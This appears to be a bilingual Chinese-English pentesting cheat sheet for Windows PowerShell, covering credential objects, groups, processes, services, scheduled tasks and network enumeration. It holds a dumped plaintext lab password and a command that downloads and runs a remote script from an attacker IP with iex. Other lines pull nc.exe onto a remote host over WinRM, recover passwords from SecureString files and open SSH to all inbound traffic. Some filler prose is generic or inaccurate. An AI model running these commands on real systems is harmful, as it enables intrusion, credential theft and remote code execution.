$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *

UserName       : Tom
Password       : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain         : HTB

SUDO

SUDO 是一种在 Linux 和 Unix 系统上使用的命令，它允许普通用户以超级用户的身份执行特权命令。这对于系统管理员和安全专家来说非常有用，因为它提供了一种限制用户权限的方法，以防止滥用和潜在的安全漏洞。

SUDO 的基本用法是在命令前加上 sudo 关键字，然后输入用户的密码进行身份验证。一旦验证成功，用户就可以执行特权命令，如安装软件、修改系统配置等。

以下是一些常用的 SUDO 命令示例：

• sudo apt-get update：更新软件包列表。
• sudo apt-get install <package>：安装特定软件包。
• sudo systemctl restart <service>：重新启动特定的系统服务。
• sudo useradd <username>：创建新用户。
• sudo passwd <username>：更改用户密码。

请注意，使用 SUDO 命令需要谨慎，因为错误的使用可能导致系统故障或安全问题。建议仅在必要时使用 SUDO，并确保只授予必要的特权。

#CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)

#For local:
Start-Process -Credential ($cred)  -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')"

#For WINRM
#CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user)
Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred
#DOWNLOAD nc.exe
Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred

Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process C:\xyz\nc.bat -verb Runas}'

#Another method
$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
$computer = "<hostname>"

用户组

In Windows, user groups are used to manage and organize users with similar permissions and access rights. By assigning users to specific groups, administrators can easily control and enforce security policies across the system.

在Windows中，用户组用于管理和组织具有相似权限和访问权限的用户。通过将用户分配到特定的组中，管理员可以轻松地在整个系统中控制和执行安全策略。

Built-in Groups

内置组

Windows provides several built-in groups that serve specific purposes:

Windows提供了几个内置组，用于特定目的：

• Administrators: Members of this group have full control over the system and can perform administrative tasks.

• Administrators：该组的成员对系统拥有完全控制权，并可以执行管理任务。

• Users: This group includes all standard users who can perform common tasks but do not have administrative privileges.

• Users：该组包括所有标准用户，他们可以执行常见任务，但没有管理员权限。

• Guests: Users in this group have limited access and are typically used for temporary or guest accounts.

• Guests：该组中的用户具有有限的访问权限，通常用于临时或访客账户。

• Power Users: This group has more privileges than standard users but fewer than administrators. It is deprecated in newer versions of Windows.

• Power Users：该组比标准用户具有更多的权限，但比管理员少。在较新的Windows版本中已被弃用。

• Backup Operators: Members of this group can perform backup and restore operations on the system.

• Backup Operators：该组的成员可以在系统上执行备份和恢复操作。

• Remote Desktop Users: Users in this group can access the system remotely using Remote Desktop.

• Remote Desktop Users：该组中的用户可以使用远程桌面远程访问系统。

Creating and Managing Groups

创建和管理组

Administrators can create custom groups to meet specific requirements. To create a group, you can use the PowerShell New-LocalGroup cmdlet:

管理员可以创建自定义组以满足特定要求。要创建一个组，可以使用PowerShell的New-LocalGroup命令：

New-LocalGroup -Name "GroupName"

To add users to a group, you can use the Add-LocalGroupMember cmdlet:

要将用户添加到组中，可以使用Add-LocalGroupMember命令：

Add-LocalGroupMember -Group "GroupName" -Member "Username"

To remove users from a group, you can use the Remove-LocalGroupMember cmdlet:

要从组中删除用户，可以使用Remove-LocalGroupMember命令：

Remove-LocalGroupMember -Group "GroupName" -Member "Username"

Group Policy Objects (GPOs)

组策略对象（GPO）

Group Policy Objects (GPOs) are used to manage and enforce security settings across multiple systems in a Windows domain. GPOs can be used to configure various settings, including user rights, password policies, software installation, and more.

组策略对象（GPO）用于在Windows域中管理和执行安全设置。GPO可用于配置各种设置，包括用户权限、密码策略、软件安装等。

To create a new GPO, you can use the New-GPO cmdlet:

要创建新的GPO，可以使用New-GPO命令：

New-GPO -Name "GPOName"

To link a GPO to a specific domain or organizational unit (OU), you can use the New-GPLink cmdlet:

要将GPO链接到特定的域或组织单位（OU），可以使用New-GPLink命令：

New-GPLink -Name "GPOName" -Target "Domain" -LinkEnabled Yes

To enforce a GPO on a specific system, you can use the Invoke-GPUpdate cmdlet:

要在特定系统上强制执行GPO，可以使用Invoke-GPUpdate命令：

Invoke-GPUpdate -Computer "ComputerName" -Force

Conclusion

结论

Understanding and managing user groups is essential for effective system administration and security. By properly assigning users to groups and configuring Group Policy Objects, administrators can ensure that the system remains secure and organized.

了解和管理用户组对于有效的系统管理和安全至关重要。通过正确地将用户分配到组中并配置组策略对象，管理员可以确保系统保持安全和有序。

Get-LocalGroup | ft Name #All groups
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators

剪贴板

The clipboard is a temporary storage area in the computer's memory that allows you to copy and paste text, images, and other data between different applications or within the same application. It is a useful feature that makes it easier to transfer information without having to retype or reformat it.

In the context of pentesting, the clipboard can be a valuable source of information. When users copy sensitive data such as passwords, credit card numbers, or confidential documents, it may remain in the clipboard temporarily. This presents an opportunity for attackers to access and extract this information.

Pentesters can leverage PowerShell to interact with the clipboard and retrieve its contents. PowerShell provides a built-in cmdlet called Get-Clipboard that allows you to retrieve the current contents of the clipboard. By executing this cmdlet, you can obtain any text or data that has been copied to the clipboard.

Here is an example of how to use the Get-Clipboard cmdlet in PowerShell:

$clipboardContents = Get-Clipboard
$clipboardContents

This code will retrieve the contents of the clipboard and store them in the variable $clipboardContents. You can then use this variable to manipulate or analyze the data as needed.

It is important to note that accessing the clipboard may require administrative privileges or specific permissions depending on the operating system and security settings. Additionally, retrieving clipboard contents may not always be possible if the data has been cleared or overwritten.

As a pentester, it is crucial to be aware of the potential risks associated with the clipboard and to exercise caution when handling sensitive information.

Get-Clipboard

进程

Processes are running instances of programs on a computer. They can be thought of as the execution of a program in memory. Each process has its own memory space and resources, and they can communicate with each other through inter-process communication mechanisms.

进程是计算机上运行的程序实例。可以将其视为在内存中执行的程序。每个进程都有自己的内存空间和资源，并且它们可以通过进程间通信机制进行通信。

Processes can be started and stopped, and they can also be monitored and controlled. In a Windows environment, PowerShell provides a powerful set of commands for managing processes.

进程可以启动和停止，也可以进行监视和控制。在Windows环境中，PowerShell提供了一套强大的命令来管理进程。

Listing Processes

To list all the running processes on a Windows system, you can use the Get-Process command. This command will display information such as the process ID, name, CPU usage, and memory usage.

要列出Windows系统上所有正在运行的进程，可以使用Get-Process命令。该命令将显示进程ID、名称、CPU使用率和内存使用率等信息。

Get-Process

Starting Processes

To start a new process using PowerShell, you can use the Start-Process command. This command allows you to specify the path to the executable file and any command-line arguments.

要使用PowerShell启动新进程，可以使用Start-Process命令。该命令允许您指定可执行文件的路径和任何命令行参数。

Start-Process -FilePath "C:\path\to\executable.exe" -ArgumentList "-arg1 value1 -arg2 value2"

Stopping Processes

To stop a running process, you can use the Stop-Process command. This command requires the process ID or name as a parameter.

要停止运行中的进程，可以使用Stop-Process命令。该命令需要进程ID或名称作为参数。

Stop-Process -Id 1234

Monitoring Processes

PowerShell provides several commands for monitoring processes. For example, you can use the Get-Process command with the -Name parameter to get information about a specific process.

PowerShell提供了几个用于监视进程的命令。例如，可以使用Get-Process命令和-Name参数来获取有关特定进程的信息。

Get-Process -Name "processname"

You can also use the Get-WmiObject command to query process information using Windows Management Instrumentation (WMI).

还可以使用Get-WmiObject命令使用Windows管理规范（WMI）查询进程信息。

Get-WmiObject -Class Win32_Process

Controlling Processes

PowerShell allows you to control processes by sending signals to them. For example, you can use the Stop-Process command with the -Force parameter to forcefully terminate a process.

PowerShell允许您通过向进程发送信号来控制它们。例如，可以使用Stop-Process命令和-Force参数来强制终止一个进程。

Stop-Process -Id 1234 -Force

You can also use the Start-Sleep command to pause the execution of a script or command for a specified amount of time.

还可以使用Start-Sleep命令暂停脚本或命令的执行一段指定的时间。

Start-Sleep -Seconds 5

Conclusion

Understanding how to manage and control processes is an important skill for a pentester. PowerShell provides a wide range of commands for listing, starting, stopping, monitoring, and controlling processes on a Windows system. By mastering these commands, you can effectively navigate and manipulate the processes running on a target system.

Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

服务

Introduction

介绍

In this section, we will cover some basic PowerShell commands that can be useful for pentesters when performing reconnaissance and enumeration on Windows systems. PowerShell is a powerful scripting language and automation framework that is built into Windows. It provides a command-line interface for interacting with the Windows operating system and can be used to perform a wide range of tasks, including system administration, network analysis, and security testing.

在本节中，我们将介绍一些基本的PowerShell命令，这些命令对于渗透测试人员在对Windows系统进行侦察和枚举时非常有用。PowerShell是一种强大的脚本语言和自动化框架，它内置于Windows中。它提供了一个命令行界面，用于与Windows操作系统进行交互，并可用于执行各种任务，包括系统管理、网络分析和安全测试。

Basic PowerShell Commands

基本的PowerShell命令

Get-Service

Get-Service

The Get-Service command is used to retrieve information about services running on a Windows system. It can be used to list all services or filter the results based on specific criteria such as service name or status.

Get-Service命令用于检索运行在Windows系统上的服务的信息。它可以用于列出所有服务，或根据特定的条件（如服务名称或状态）筛选结果。

To list all services, simply run the following command:

要列出所有服务，只需运行以下命令：

Get-Service

This will display a list of all services along with their status, display name, and service name.

这将显示所有服务的列表，以及它们的状态、显示名称和服务名称。

To filter the results based on a specific service name, use the -Name parameter followed by the service name. For example, to retrieve information about the "Spooler" service, run the following command:

要根据特定的服务名称筛选结果，请使用-Name参数，后跟服务名称。例如，要检索有关“Spooler”服务的信息，请运行以下命令：

Get-Service -Name Spooler

This will display information about the "Spooler" service only.

这将仅显示有关“Spooler”服务的信息。

To filter the results based on a specific service status, use the -Status parameter followed by the desired status. For example, to list all running services, run the following command:

要根据特定的服务状态筛选结果，请使用-Status参数，后跟所需的状态。例如，要列出所有正在运行的服务，请运行以下命令：

Get-Service -Status Running

This will display a list of all running services.

这将显示所有正在运行的服务的列表。

Start-Service

Start-Service

The Start-Service command is used to start a stopped service on a Windows system. It requires administrative privileges to run.

Start-Service命令用于启动Windows系统上的已停止的服务。它需要管理员权限才能运行。

To start a service, use the following command:

要启动一个服务，请使用以下命令：

Start-Service -Name <service_name>

Replace <service_name> with the name of the service you want to start.

将<service_name>替换为您要启动的服务的名称。

Stop-Service

Stop-Service

The Stop-Service command is used to stop a running service on a Windows system. It requires administrative privileges to run.

Stop-Service命令用于停止Windows系统上正在运行的服务。它需要管理员权限才能运行。

To stop a service, use the following command:

要停止一个服务，请使用以下命令：

Stop-Service -Name <service_name>

Replace <service_name> with the name of the service you want to stop.

将<service_name>替换为您要停止的服务的名称。

Conclusion

结论

PowerShell provides a powerful set of commands for managing services on Windows systems. The Get-Service, Start-Service, and Stop-Service commands can be used to retrieve information about services, start stopped services, and stop running services, respectively. These commands can be useful for pentesters during the reconnaissance and enumeration phases of a penetration test.

PowerShell提供了一套强大的命令，用于管理Windows系统上的服务。Get-Service、Start-Service和Stop-Service命令分别用于检索有关服务的信息、启动已停止的服务和停止正在运行的服务。这些命令在渗透测试的侦察和枚举阶段对渗透测试人员非常有用。

Get-Service

从安全字符串中获取密码

在进行渗透测试时，我们经常需要处理密码。在Windows环境中，密码通常以安全字符串的形式存储，这是一种加密的方式，可以保护密码的机密性。然而，对于渗透测试人员来说，我们需要将安全字符串转换为可读的密码，以便在测试过程中使用。

PowerShell提供了一种从安全字符串中获取密码的方法。以下是一个示例脚本，演示了如何使用PowerShell从安全字符串中提取密码：

$secureString = ConvertTo-SecureString -String "MySecurePassword" -AsPlainText -Force
$plainTextPassword = [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureString))
Write-Output $plainTextPassword

在上面的示例中，我们首先使用ConvertTo-SecureString命令将明文密码转换为安全字符串。然后，我们使用[Runtime.InteropServices.Marshal]::SecureStringToBSTR方法将安全字符串转换为BSTR（基于COM的字符串）表示。最后，我们使用[Runtime.InteropServices.Marshal]::PtrToStringAuto方法将BSTR转换为可读的密码。

请注意，这种方法只适用于当前会话中的密码。如果密码是在其他会话中创建的，那么我们将无法提取密码。

这是一个简单而有效的方法，可以帮助渗透测试人员在Windows环境中处理安全字符串并获取密码。

$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
$cred=new-object system.management.automation.pscredential("administrator", $pw)
$cred.getnetworkcredential() | fl * #Get plaintext password

计划任务

Scheduled tasks are a powerful feature in Windows that allow you to automate the execution of scripts or programs at specific times or intervals. As a pentester, understanding how to leverage scheduled tasks can be beneficial for persistence, privilege escalation, and lateral movement.

计划任务是Windows中的一个强大功能，它允许您在特定时间或间隔内自动执行脚本或程序。作为一名渗透测试人员，了解如何利用计划任务可以对持久性、权限提升和横向移动产生积极影响。

Viewing Scheduled Tasks

查看计划任务

To view the existing scheduled tasks on a Windows system, you can use the Get-ScheduledTask cmdlet in PowerShell. This cmdlet retrieves a list of all scheduled tasks along with their properties.

要查看Windows系统上现有的计划任务，您可以使用PowerShell中的Get-ScheduledTask命令。该命令检索所有计划任务及其属性的列表。

Get-ScheduledTask

Creating Scheduled Tasks

创建计划任务

To create a new scheduled task, you can use the New-ScheduledTask cmdlet in PowerShell. This cmdlet allows you to specify the script or program to be executed, the trigger that defines when the task should run, and other settings such as the user account under which the task should run.

要创建一个新的计划任务，您可以使用PowerShell中的New-ScheduledTask命令。该命令允许您指定要执行的脚本或程序、定义任务何时运行的触发器以及其他设置，如任务应在哪个用户帐户下运行。

New-ScheduledTask -Action (New-ScheduledTaskAction -Execute "C:\path\to\script.ps1") -Trigger (New-ScheduledTaskTrigger -Daily -At 3am) -User "DOMAIN\username" -Password "password"

Modifying Scheduled Tasks

修改计划任务

To modify an existing scheduled task, you can use the Set-ScheduledTask cmdlet in PowerShell. This cmdlet allows you to change various properties of the task, such as the script or program to be executed, the trigger, and the user account.

要修改现有的计划任务，您可以使用PowerShell中的Set-ScheduledTask命令。该命令允许您更改任务的各种属性，如要执行的脚本或程序、触发器和用户帐户。

Set-ScheduledTask -TaskPath "\Folder" -TaskName "TaskName" -Action (New-ScheduledTaskAction -Execute "C:\path\to\newscript.ps1") -Trigger (New-ScheduledTaskTrigger -Daily -At 4am) -User "DOMAIN\username" -Password "password"

Deleting Scheduled Tasks

删除计划任务

To delete a scheduled task, you can use the Unregister-ScheduledTask cmdlet in PowerShell. This cmdlet removes the specified task from the system.

要删除计划任务，您可以使用PowerShell中的Unregister-ScheduledTask命令。该命令从系统中删除指定的任务。

Unregister-ScheduledTask -TaskPath "\Folder" -TaskName "TaskName"

Conclusion

结论

Scheduled tasks are a useful feature in Windows that can be leveraged by pentesters for various purposes. By understanding how to view, create, modify, and delete scheduled tasks using PowerShell, you can effectively utilize this feature during your engagements.

Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

网络

接口

PowerShell命令

Get-NetAdapter

此命令用于获取系统上的所有网络适配器的详细信息。

示例输出

Name                      InterfaceDescription                    ifIndex Status       MacAddress             LinkSpeed
----                      --------------------                    ------- ------       ----------             ---------
Ethernet                  Intel(R) Ethernet Connection (2) I219-V      12 Up           00-11-22-33-44-55       1 Gbps
Wi-Fi                     Intel(R) Dual Band Wireless-AC 8265          13 Up           66-77-88-99-AA-BB       300 Mbps

解释

• Name：适配器的名称。
• InterfaceDescription：适配器的描述。
• ifIndex：适配器的索引号。
• Status：适配器的状态。
• MacAddress：适配器的物理地址。
• LinkSpeed：适配器的链接速度。

PowerShell命令

Get-NetIPAddress

此命令用于获取系统上的所有IP地址的详细信息。

示例输出

IPAddress         : 192.168.0.100
InterfaceIndex    : 12
InterfaceAlias    : Ethernet
AddressFamily     : IPv4
Type              : Unicast
PrefixLength      : 24
PrefixOrigin      : Manual
SuffixOrigin      : Manual
AddressState      : Preferred

IPAddress         : fe80::1234:5678:abcd:efgh%13
InterfaceIndex    : 13
InterfaceAlias    : Wi-Fi
AddressFamily     : IPv6
Type              : Unicast
PrefixLength      : 64
PrefixOrigin      : WellKnown
SuffixOrigin      : Link
AddressState      : Preferred

解释

• IPAddress：IP地址。
• InterfaceIndex：适配器的索引号。
• InterfaceAlias：适配器的别名。
• AddressFamily：地址类型（IPv4或IPv6）。
• Type：地址类型（单播、广播等）。
• PrefixLength：前缀长度。
• PrefixOrigin：前缀来源。
• SuffixOrigin：后缀来源。
• AddressState：地址状态。

PowerShell命令

Get-NetRoute

此命令用于获取系统上的所有路由表项的详细信息。

示例输出

DestinationPrefix          NextHop         RouteMetric ifIndex
-----------------          -------         ----------- -------
0.0.0.0/0                  192.168.0.1     25          12
192.168.0.0/24             0.0.0.0         25          12

解释

• DestinationPrefix：目标前缀。
• NextHop：下一跳地址。
• RouteMetric：路由度量值。
• ifIndex：适配器的索引号。

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

防火墙

A firewall is a network security device that monitors and controls incoming and outgoing network traffic based on predetermined security rules. It acts as a barrier between a trusted internal network and an untrusted external network, such as the internet. Firewalls can be implemented as hardware appliances or as software running on a computer.

防火墙是一种网络安全设备，根据预先确定的安全规则监控和控制进出网络的流量。它作为一个屏障存在于可信任的内部网络和不可信任的外部网络（如互联网）之间。防火墙可以作为硬件设备或作为运行在计算机上的软件来实现。

Firewalls use various techniques to filter network traffic, such as packet filtering, stateful inspection, and application-level gateways. They can block or allow traffic based on factors such as source and destination IP addresses, port numbers, and protocols.

防火墙使用各种技术来过滤网络流量，如数据包过滤、状态检查和应用层网关。它们可以根据源和目标IP地址、端口号和协议等因素来阻止或允许流量通过。

Firewalls are an essential component of network security and are commonly used to protect against unauthorized access, malware, and other cyber threats. They can also be configured to log network activity, providing valuable information for monitoring and incident response.

防火墙是网络安全的重要组成部分，通常用于防止未经授权的访问、恶意软件和其他网络威胁。它们还可以配置为记录网络活动，为监控和事件响应提供有价值的信息。

Get-NetFirewallRule -Enabled True

Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Block
Get-NetFirewallRule -Direction Inbound -Enabled True -Action Allow

# Open SSH to the world
New-NetFirewallRule -DisplayName 'SSH (Port 22)' -Direction Inbound -LocalPort 22 -Protocol TCP -Action Allow

# Get name, proto, local and rremote ports, remote address, penable,profile and direction
## You can user the following line changing the initial filters to indicat a difefrent direction or action
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property  DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},Profile,Direction,Action

路由

A route is a path that network traffic takes from one network to another. In the context of penetration testing, understanding and manipulating routes can be crucial for gaining access to target systems.

路由是网络流量从一个网络到另一个网络的路径。在渗透测试的背景下，理解和操纵路由对于获取目标系统的访问权限至关重要。

Route Enumeration

Route enumeration is the process of identifying and gathering information about the routes that exist on a target system. This information can be used to identify potential paths for further exploitation.

路由枚举是识别和收集目标系统上存在的路由信息的过程。这些信息可以用于识别进一步利用的潜在路径。

Route Manipulation

Route manipulation involves modifying the existing routes on a target system to redirect network traffic to a desired destination. This can be done by adding, modifying, or deleting routes.

路由操纵涉及修改目标系统上现有的路由，将网络流量重定向到所需的目标。可以通过添加、修改或删除路由来实现。

Route Redirection

Route redirection is a technique used to redirect network traffic from one network to another through a compromised system. This can be useful for bypassing network security measures and gaining unauthorized access to target systems.

路由重定向是一种通过受损系统将网络流量从一个网络重定向到另一个网络的技术。这对于绕过网络安全措施并未授权地访问目标系统非常有用。

Route Poisoning

Route poisoning is a method of manipulating routing tables to misdirect network traffic. By injecting false routing information, an attacker can redirect traffic to a malicious destination or cause network disruptions.

路由毒化是一种通过操纵路由表来误导网络流量的方法。通过注入虚假的路由信息，攻击者可以将流量重定向到恶意目标或导致网络中断。

Route Tracing

Route tracing, also known as traceroute, is a technique used to determine the path that network traffic takes from a source to a destination. This can be useful for identifying network bottlenecks, troubleshooting connectivity issues, and understanding the network topology.

路由跟踪，也称为traceroute，是一种用于确定网络流量从源到目的地的路径的技术。这对于识别网络瓶颈、解决连接问题和了解网络拓扑非常有用。

route print

ARP

ARP（地址解析协议）是一种用于将IP地址映射到物理MAC地址的协议。在局域网中，ARP被用于确定目标设备的MAC地址，以便在数据包传输过程中正确地将数据包发送到目标设备。

ARP欺骗是一种利用ARP协议的漏洞来欺骗网络设备的攻击技术。攻击者可以发送虚假的ARP响应，将目标设备的IP地址映射到攻击者的MAC地址上。这样，攻击者就可以拦截、修改或重定向目标设备的网络流量。

在进行ARP欺骗时，攻击者通常会使用工具如Ettercap、ARPspoof或Bettercap来发送虚假的ARP响应。这些工具允许攻击者欺骗目标设备，使其相信攻击者的MAC地址是正确的。

为了防止ARP欺骗攻击，可以采取一些基本的防御措施，如使用静态ARP表、启用ARP检测和防御工具、使用网络隔离和安全认证等。这些措施可以帮助保护网络免受ARP欺骗攻击的影响。

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

主机

The hosts file is a plain text file used by operating systems to map hostnames to IP addresses. It is commonly used to block or redirect certain websites or to override DNS settings. As a pentester, you can leverage the hosts file to redirect traffic to your own IP address or to bypass DNS resolution.

主机文件

hosts文件是操作系统使用的纯文本文件，用于将主机名映射到IP地址。它通常用于阻止或重定向特定的网站，或者用于覆盖DNS设置。作为渗透测试人员，您可以利用hosts文件将流量重定向到自己的IP地址，或者绕过DNS解析。

Get-Content C:\WINDOWS\System32\drivers\etc\hosts

Ping

Ping是一种常用的网络工具，用于测试主机之间的连通性。它通过向目标主机发送ICMP回显请求并等待回复来确定主机是否可达。Ping命令通常用于诊断网络问题和测量网络延迟。

使用Ping命令可以执行以下操作：

• 检查目标主机是否在线
• 测试网络连接的稳定性
• 测量网络延迟
• 确定网络中的丢包率

Ping命令的基本语法如下：

ping <目标主机>

其中，<目标主机>是要测试连通性的主机的IP地址或域名。

Ping命令会发送一系列ICMP回显请求到目标主机，并显示每个请求的往返时间（RTT）以及丢包情况。通过观察Ping命令的输出，可以判断目标主机的连通性和网络质量。

Ping命令还支持一些可选参数，例如：

• -c <次数>：指定发送ICMP请求的次数。
• -i <间隔>：指定发送ICMP请求的间隔时间。
• -s <大小>：指定ICMP请求的数据包大小。

使用Ping命令时，需要注意以下几点：

• Ping命令需要在命令行界面（如Windows的命令提示符或Linux的终端）中执行。
• 需要具有足够的权限才能执行Ping命令。
• 有些网络设备（如防火墙）可能会阻止Ping请求，导致无法正常执行Ping命令。

Ping命令是网络诊断和故障排除中的重要工具，对于网络管理员和安全专业人员来说非常有用。

$ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("10.9.15.$_") | select address, status }

SNMP

SNMP（Simple Network Management Protocol）是一种用于管理和监控网络设备的协议。它允许管理员通过发送和接收消息来获取有关设备的信息，例如系统状态、网络流量和错误日志。SNMP使用基于UDP的传输协议，并使用MIB（Management Information Base）来定义设备上可用的信息。

攻击者可以利用SNMP协议来获取目标网络设备的敏感信息，例如设备配置、用户凭据和网络拓扑。他们可以使用SNMP工具来扫描网络并发现SNMP服务，然后使用默认或弱密码进行身份验证。一旦成功登录，攻击者可以执行各种操作，包括修改设备配置、监控网络流量和执行远程命令。

为了防止SNMP攻击，管理员可以采取以下措施：

• 禁用不必要的SNMP服务或将其限制在受信任的主机上。
• 使用强密码来保护SNMP身份验证。
• 定期更新设备的固件和操作系统以修复已知的SNMP漏洞。
• 监控SNMP活动并检测异常行为，例如频繁的身份验证失败或大量的SNMP查询。

通过采取这些措施，管理员可以增强网络设备的安全性，并减少受到SNMP攻击的风险。

Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

将SDDL字符串转换为可读格式

To convert the SDDL (Security Descriptor Definition Language) string into a readable format, you can use the ConvertFrom-SddlString cmdlet in PowerShell. This cmdlet allows you to parse and interpret the SDDL string, providing a more human-readable output.

$sddlString = "D:(A;;GA;;;WD)(A;;GA;;;BA)"
$securityDescriptor = ConvertFrom-SddlString -Sddl $sddlString
$securityDescriptor

The ConvertFrom-SddlString cmdlet takes the SDDL string as input and returns a System.Security.AccessControl.CommonSecurityDescriptor object. This object contains the parsed information from the SDDL string, such as the access control entries (ACEs) and their corresponding permissions.

By running the above code, you will see the converted SDDL string in a readable format, which includes the access control entries and their permissions.

Note: It is important to understand the SDDL format and its components to effectively interpret the converted output.

PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;CI;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-1164)(OA;CI;CC;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aa5-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CC;5cb41ed0-0e4c-11d0-a286-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-3842939050-3880317879-2865463114-5181)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;9a7ad945-ca53-11d1-bbd0-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;bf967991-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967a06-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a0a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;3e74f60e-3e73-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;b1b3a417-ec55-4191-b327-b72e33e38af2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf96791a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;9a9a021e-4a5b-11d1-a9c3-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;0296c120-40da-11d1-a9c0-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;934de926-b09e-11d2-aa06-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5e353847-f36c-48be-a7f7-49685402503c;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;8d3bca50-1d7e-11d0-a081-00aa006c33ed;;S-1-5-21-